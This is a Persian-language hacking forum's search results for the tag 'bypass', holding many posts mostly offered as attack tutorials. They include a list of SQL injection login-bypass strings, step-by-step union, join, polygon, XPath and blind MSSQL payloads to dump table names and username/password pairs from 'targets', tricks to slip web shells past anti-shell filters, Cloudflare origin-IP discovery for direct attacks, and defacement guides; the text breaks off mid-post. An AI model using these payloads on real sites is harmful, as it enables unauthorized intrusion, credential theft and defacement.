رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'bypass'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  2. × حفره امنیتی و یا همان باگ چیست ؟ » به نقص ها و سهل انگاری های برنامه نویسان، طراحان وب سایت ها، در کارهای خود به جای میگذارند، نفوذگر آنها را پیدا کرده و از طریق این حفره ها اقدام به نفوذ میکند را باگ می گویند ! × تارگت چیست ؟ » معنی اصلی این کلمه یعنی هدفی که از قبل تعیین شده، به طور مثال نفوذگر پس از جمع آوری کامل اطلاعات از یک وب سایت فهمیده است که این وب سایت حفره امنیتی دارد و میتواند از طریق این حفره ها و باگ ها اقدام به نفوذ کند و آن را هدف و یا تارگت خود قرار میدهد ! × اکسپلویت چیست ؟ » به یکسری کد های مخرب که توسط مهاجم و یا همان نفوذگر نوشته میشود را اکسپلویت می نامند. × پیلود چیست ؟ » به یکسری کد های مخرب وظیفه انتقال پکتهای ارتباطی بین دو کامپیوتر یا چندبن کامپیوتر به صورت غیر مجاز را دارند پیلود میگویند. × کیلاگر چیست ؟ » نرم افرار و یا برنامه ای برای دسترسی به تمامی کلمات و یا حروفی که بر روی صفحه کلید تارگت تایپ میشود را ذخیره و برای نفوذگر ارسال میشود،این کلمات میتوان از انواع آدرس ها مانند حساب های بانکی، پسورد ها و را در نظر گرفت ! × بایپس چیست ؟ » به معنای دور زدن هست یعنی هکر با روش های خاصی موانع امنیتی را دور میزند ! × کلاینت چیست ؟ » سیستم های که از یک سرور خدمات دریافت میکنند را کلاینت های می نامند، برای مثال شما یک کلاینت هستید ! × شل چیست ؟ » در هک هنگامی که هکر با استفاده از ابزارها و کارهای خود میتونه به سیستم قربانی نفوذ کنه و کنترل سیستم رو بدست بگیره اصطلاحا میگن شل گرفته و میتونه تصمیمات خودش رو عملی کنه ! × دیفیس چیست ؟ » وقتی یه هکر سایتی رو هک میکنه ، نمای صفحه اصلی (یا بقیه صفحه های) سایت رو تغییر میده و ممکنه اسم خودش رو هم درج کنه و مسئولیت هک سایت رو بپذیره به این صفحه دیفیس پیج میگویند ! × مس دیفیس چیست ؟ » مس دیفیس هم مثل همون دیفیس هست با این فرق که شما وقتی تمام سایت های متعلق به یک سرور خاص رو دیفیس کنید میگویند مس دیفیس انجام داده اید ! × بک دور چیست ؟ » در هک وقتی یه هکر به سیستمی نفوذ کرد عمدا راه دومی برای نفوذهای بعدی در سیستم هک شده قرار میده تا اگه یوقت احیانا راه نفوذ فعلی شناسایی و بسته شد بتونه با کمک در پشتی که ایجاد کرده دوباره نفوذ کنه ! هماهنگ شده با ادمین عزیز @proxy
  3. R3DN4X314

    دور زدن فایروال

    در این جلسه یه ابزار برای دور زدن فایروال بهتون معرفی میکنم ، که از history های DNS برای bypass فایروال سو استفاده میکنه که به طرز جالبی ساده پیاده سازی میشه ، شما فقط کافیه تارگت رو مشخص کنید تا فرایند شروع بشه که به عنوان مثال از تلاش برای پیدا کردن ایپی سرور پشت فایروال شروع میشه ، مثل : Cloudflare , Incapsula و Sucuri و ... این ابزار به طور کامل با شل bash نوشته شده ، و برای استفاده کافیه با اپشن d- تارگت رو مشخص کنید ، مثال : bash bypass-firewalls-by-DNS-history.sh -d your-target لینک زیر حاویه مختصر توضیحات در مورد ریز فرایند مربوطه و همچنین نحوه استفاده ساده ابزار و نهایتا لینک دانلود اسکریپته : [Hidden Content]
  4. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  5. MR.MSA

    بایپس آنتی شل

    با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
  6. MR.MSA

    اسیب پذیری Xpath Injection

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  7. MR.MSA

    متد blind در سایت های asp

    با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌) 99 ‌< true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  8. MR.MSA

    روش حرفه ای محدود سازی تیبل ها

    با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
  9. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  10. MR.MSA

    sql injection در سایت های asp

    با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . سطح : متوسط تفاوت mssqli و mysql : Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد . ------------------------------------------------------------------------------------------------------------------------ تست آسیب پذیری ‌: به ادرس سایت ‘a را اضافه کنید . به این صورت : Site.com/news.aspx?id=4’a و با دریافت خطا یعنی سایت اسیب پذیر است . ------------------------------------------------------------------------------------------------------------------------ بیرون کشیدن اطلاعات اولیه : روش اول : Site.com/news.aspx?id=4+and+1=(convert(int,x)) روش دوم : Site.com/news.aspx?id=4+or+1=(convert(int,x)) و به جای x می توانید این مقادیر بزنید ‌: user db_name @@servername @@version Host_@@version Host_name و.... ------------------------------------------------------------------------------------------------------------------------ برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید . امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم .
  11. MR.MSA

    متد separator در sql injection

    با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . متد separator‌ : در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : ..........(group_concat(table_name,0x3c62723e...... حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : .......( group_concat((table_name)separator 0x3c62723e...... زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
  12. MR.MSA

    نکته مهم در متد join

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  13. MR.MSA

    آموزش متد polygon در sql injection

    با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که :‌ در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که :‌ با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon :‌ ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : [Hidden Content]((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
  14. MR.MSA

    متد join در sql injection

    با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join :‌ ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر :‌ +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
  15. بسم الله الرحمن الرحیم با اجازه ی دوستان می خوام تحولی در بایپس ها ایجاد کنم! ( البته با کمک دوستان) می خوام کاملترین آموزش بایپس ها SQL رو از مبتدی تا پیشرفته توی انجمن قرار بدم. انشاالله با کمک دوستان می خواهم جامع ترین تاپیک بایپس های اس کیو ال رو بزنیم. دوستان هم اگه بایپس خاصی رو بلدند حتی اگر priv8 هستش رو توی خصوصی به من بگویند تا توی آموزش ها ازش استفاده بشود. سعی میشه توی آموزشات تمامی بایپس ها توضح داده بشه و بایپسی از زیر دستمون در نره. J همچنین برای هر دستور یک پارت در نظر گرفته شده. (تا بتوانیم به طور جامع به هر دستور بپردازیم.) قوانین رو هم بلدید ، من دیگه متذکر نمیشم. با تشکر.
  16. درود, آموزش دیفیس(هک) وبسایت با کمک افزونه Noredirect در فایرفاکس سوالی هست زیر همین تاپیک جواب میدم امیدوارم مفید باشه و در راه آموزش استفاده شه! پسورد : guardiran.org Goodzilam.part1.rar Goodzilam.part2.rar
  17. با سلام خدمت تمامی کاربران و اعضای محترم تیم امنیتی گارد ایران کلود هاوند ابزاری قدرتمند به جهت عبور از سیستم محافظتی کلودفلیر و به دست آوردن آی پی اصلی تارگت می باشد ؛ این ابزار به زبان PHP با کیت کنسول اپلیکیشن رد فریم ورک پیاده سازی شده و به جرات می توان گفت هیچ رقیب هم ترازی برای این ابزار وجود ندارد . متود های استفاده شده برای بایپس پایگاه داده شخصی گاردایران از وبسایت های تحت حفاظت کلودفلیر (در حال حاضر این دیتابیس دارای بیشتر از دو میلیون رکوردست است که روز به روز به این تعداد افزوده می شود ؛ این دیتابیس دارای سیستم Automatic Farming فعال بر روی VPS است که روزانه عمل Farming از سطح اینترنت را انجام خواهد داد) حمله افشای آی پی (این حمله از طریق متد پینگ بک ، استفاده شده در سیستم های مدیریت محتوا امکان پذیر است) اسکن گسترده زیر دامنه ها (بیشتر از 10 هزار زیر دامنه رایج) نیازمندی های کلودهاوند پی اچ پی ورژن پنج به بالا افزونه PHP_PDO_SQLITE نحوه استفاده خط فرمان یا ترمینال را در پوشه ریشه ای نرم افزار باز کرده و دستور زیر را تایپ کنید : php application از زمان اجرای نرم افزار دو فرمان عملیاتی در دسترس شما قرار دارد : detect hostname whois hostname ویدیو معرفی توسعه دهندگان کاری مشترک از : @R3dC0d3r & @RT3N پی نوشت تمامی حقوق این نرم افزار متعلق به تیم امنیتی گارد ایران می باشد کلودهاوند دارای لایسانس GPL 3 می باشد ؛ هرگونه تخطی از قوانین مربوط به این لایسانس برابر قطع دسترسی از API گاردایران خواهد بود - مخزن گیت هاب کلود هاوند CloudHound V1.0.0.zip
  18. سلام اینم اموزش عالی و کاربردی { bypass error 500 } توی بیشتر سایت ها ادمین برخی قسمت ها رو غیرقابل دسترسی میکنه که یکی از اون ها میتونه قسمت ذخیره شدنه پسورد و یوزرنیم باشه. شما با بایپس کردن این بخش ها میتونیدکار های زیادی انجام بدین. رمز فایل : gaurdiran.org تشکر فراموش نشه بایپس.rar
  19. آموزش ساده ای هست و مفهوم krack رو به راحتی به بیننده نشون میده. حمله خطرناک krack این هست که بدون داشتن پسورد یک مودم و ورود به شبکه داخلی بین موبایل و مودم، بتونید ببینید موبایل چه اطلاعاتی رو داره از طریق مودم ردوبدل میکنه. آموزش به زبان انگلیسی و استفاده شده از محیط های شبیه سازی اندروید دانلود شده از Youtube رمز عبور: guardiran.org KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part1.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part2.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part3.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part4.rar
  20. با سلام خدمت همه ی دوستان خیلی از وبمستر ها از Cloudflare برای ماسک گذاری آی پی سرورشون بمنظور حفاظت در برابر حملات DDOS استفاده می کنن.Cloudflare با نشستن بین کلاینت ها و سرور کار خودش رو انجام میده. با این میانجی گری های Cloudflare، ای پی یک سرور تا زمانی که کلاینت ها از طریق CloudFlare بهش متصل بشن، هیچوقت کشف نخواهد شد. هر حمله ای که صورت میگیره اول از همه به سمت CloudFlare مسیردهی میشه و به بن بست میخوره اما راه های دیگه ای وجود دارن که حمله کننده با اونها میتونه آی پی اصلی سرور رو شناسایی کنه و مستقیماً اقدام به حمله بکنه. در اینجا چندین روش رو میخوام توضیح بدم، یه توضیح خلاصه ای در خصوص پس زمینه ی تئوریک چگونگی و چرایی عملکرد Cloudflare ارائه بدم و بعدش هم توضیحاتی رو در خصوص حل اون موانع بگم: 1- DNS Resolution پس زمینه: اساسی ترین تکنیک اکثر Resolver ها (جاهایی که آی پی محافظت شده توسط CloudFlare رو کشف و اعلام می کنند) استفاده از روش بروت فورس رکورد های DNS هست. اما اول، بذارید توضیح کوچیکی بدم که این چطور کار میکنه. فرض کنید شما صاحب وبسایت example.com با ای پی سرور 111.111.111.111 هستید. عملکرد کلاسیک Cloudflare به شرح عکس زیر هست: بطور خلاصه، شما مدیریت DNS خودتون رو میدید دست CloudFlare. رکورد A دامنه ی شما (که توی عکس نوشتم "وبسایت بدون حفاظ شما") به آدرس آی پی شبکه گسترده و جهانی CloudFlare تغییر پیدا میکنه. الان دیگه کلیه اتصالات به وبسایت example.com بجای آی پی اصلی به آی پی CloudFlare (مثلا 222.222.222.222) ارسال میشن و CloudFlare هم درخواست های پراکسی بین بازدید کننده ها و سرور اصلی رو رزرو میکنه تا این اتصال با وجود یک واسط ایجاد بشه. موضوع این هست که CloudFlare فقط ارتباطات HTTP/HTTPS (پورت های 80 و 443) دریافتی از فضای سراسری وب به ای پی سرور شما رو پراکسی میکنه و از طریق پورت دیگه ای نمیتونه شما رو مخفی بکنه. اینجا چه اتفاقی میفته؟ ماجرا اینه که با وارد کردن آدرس example.com توی مرورگر شما از طریف پورت HTTP یا HTTPS به آی پی 222.222.222.222 وصل میشید ولی اگر بزنید ftp.example.com امکان ارتباط از طریق پورت 21 یا هر سرویس در حال اجرای دیگه ای به وبسایت رو ندارید. چونکه Cloudflare نمیاد پورت 21 شما رو هم محافظت کنه. سرور های CloudFlare به FTP (پورت 